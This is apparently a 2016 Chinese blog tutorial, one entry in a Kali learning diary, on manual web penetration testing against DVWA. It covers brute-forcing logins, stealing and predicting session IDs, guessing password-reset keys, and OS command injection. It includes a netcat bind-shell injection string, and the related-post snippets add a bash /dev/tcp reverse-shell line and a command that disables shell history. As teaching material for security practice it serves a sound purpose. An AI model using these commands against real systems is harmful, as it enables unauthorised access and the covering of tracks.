小白日记36:kali渗透测试之Web渗透-手动漏洞挖掘(二)-突破身份认证,操作系统任意命令执行漏洞

原创 2016年10月22日 10:13:15

手动漏洞挖掘

######################################################################################

手动漏洞挖掘原则【会比自动扫描器发现的漏洞要多,要全面】

1.每一个变量都进行尝试

2.所有头【如:cookie中的变量】

3.逐个变量删除

######################################################################################


身份认证

1、常用弱口令/基于字典的密码爆破

2、锁定机制

手工猜测,若无锁定机制,则进行爆破

3、信息收集【分站上信息收集,猜测账号密码,如:用户光荣榜等。】

手机号:对于隐藏部分的手机号,猜测其确切账号(手动输入,已知手机号,观察密码错误提示信息【如:用户名有误】,则爆破用户名)

密码错误提示信息

(burpsuite:观察返回信息内容【观察errorcode】)

4、密码嗅探【在同一个网络下,可通过抓包分析,获取用户名密码】


burpsuite演示

0、关闭截断代理,在dvwa登录页面中使用错误账号登录,分析数据包


a.账号密码都是错的


b.账号正确,密码错误

右键比较sent to compare



###通过比较,发现是否存在有价值的信息####


若两次返回结果不一样,则基于comparer做Intruder【轰炸机】

 





1、当无法使用账号密码登录时,转向会话sessionID/cookie

a.跨站脚本结合社会工程学,获得cookie【后面再介绍】

b.有些做得不好的web application会将SessionID放在URL中传输,可通过社工获得

c.正常情况下SessionID会放在cookie或body中,可使用嗅探

#嗅探注入【SessionID:一.以文件形式存在电脑;二.存在内存中(最常见)】


#将SessionID注入浏览器



注:留意SessionID存活时间,与是否每次登录都随机生成


#SessionID生成算法

#使用burpsuite中的sequencer对某站点的SessionID生成算法进行考量【若重复几率大或可判断算法】建议使用通用被验证的算法

若使用不安全的私有算法,可以预判下一次登录时生成的SessionID


2、密码找回场景

找回密码链接:(举例)

https://www.example.com/reset?email=user@example.com&key=b4c9a289323b21a01c3e940f150eb9b8c
542587f1abfd8f0e1cc1ffc5e475514

对key值进行观察猜测,如:字节。【128--MD5    160--SHA1    256--SHA256】

###有可能是根据邮箱账号,进行了加密的算法,经修改后,可直接重设密码


当有限登录一个账号密码后,进行手动爬网,自动扫描
#操作系统任意命令执行漏洞

a.过滤,只显示有参数的请求


b.使用Repeater测试

逐步删除无用变量,试出可影响页面内容的变量

对符号型输入,先进行编码

##没对输入变量进行过滤


命令行模式下使用的命令,可通过源码查看过滤

#medium级别


shell命令掌握技能和技巧

“&”:并行执行命令

“|”:管道符

“||”:前面命令执行失败,执行后面的命令

“curl”:命令行模式下,定制URL,发起http请求

#high级别



c.利用这种漏洞,可使其执行开放端口等操作

如:;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe


d.反弹shell

shell脚本在哪台机器的应用服务上,就会返回哪台机器的shell
























版权声明:本文为博主原创文章,未经博主允许不得转载。

小白日记15:kali渗透测试之弱点扫描-漏扫三招、漏洞管理、CVE、CVSS、NVD

发现漏洞 弱点发现方法: 1、基于端口服务扫描结果版本信息,比对其是否为最新版本,若不是则去其 官网查看其补丁列表,然后去逐个尝试,但是此法弊端很大,因为各种端口应用比较多,造成耗时大。    ...
  • ZiXuanFY
  • ZiXuanFY
  • 2016年09月13日 14:25
  • 2502

Metaspliot进行漏洞扫描

Metaspliot进行漏洞扫描 Metasploit框架是Metasploit项目中最著名的创作,是一个软件开发、测试和利用漏洞的平台。它可以用来创建安全测试工具开发的模块,也可利用模块作...
  • h4ck0ne
  • h4ck0ne
  • 2016年01月23日 17:48
  • 9352

Linux 一句话反弹shell

/bin/bash  -i > /dev/tcp/attackerip/connect端口 0&1 直接在服务
  • hack8
  • hack8
  • 2014年09月29日 03:33
  • 2496

Linux下反弹shell的三种方法

Linux下反弹shell的三种方法
  • zoushurong1
  • zoushurong1
  • 2017年09月12日 16:44
  • 573

linux下反弹shell的几种方法

在反弹的开始,我们需要使用nc在本地或者任意要反弹到的地方监听一个端口。最简单的做法是nc -l -p 8080,8080为要反弹的端口0x01—使用bashbash -i >& /dev/[tcp|...
  • u012985855
  • u012985855
  • 2017年03月20日 08:15
  • 3691

Linux 入侵检测技巧知识

1. 登录ssh之后不记录history unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev...
  • citelao
  • citelao
  • 2016年03月17日 21:29
  • 176

Linux渗透之反弹Shell命令解析

前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告...
  • deeplearnings
  • deeplearnings
  • 2017年08月18日 11:32
  • 293

一个简单的SHELL脚本模板

一个简单的SHELL脚本模板,适用于Java项目的启动,停止,重启。
  • Readiay
  • Readiay
  • 2016年08月29日 10:11
  • 2249

linux shell 脚本实现tcp/upd协议通讯(重定向应用)

前几天发了重定向以及管道相关使用方法,今天这里发些很有趣的例子。通过重定向实现基于tcp/udp协议的软件通讯。   linux 设备里面有个比较特殊的文件: /dev/[tcp|upd]/hos...
  • sdcxyz
  • sdcxyz
  • 2014年03月20日 13:39
  • 4466

Linux Shell 脚本实现访问Gmail

突然有个想法想试试通过Linuxmingli
  • fengzei886
  • fengzei886
  • 2014年10月16日 17:45
  • 3297
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:小白日记36:kali渗透测试之Web渗透-手动漏洞挖掘(二)-突破身份认证,操作系统任意命令执行漏洞
举报原因:
原因补充:

(最多只允许输入30个字)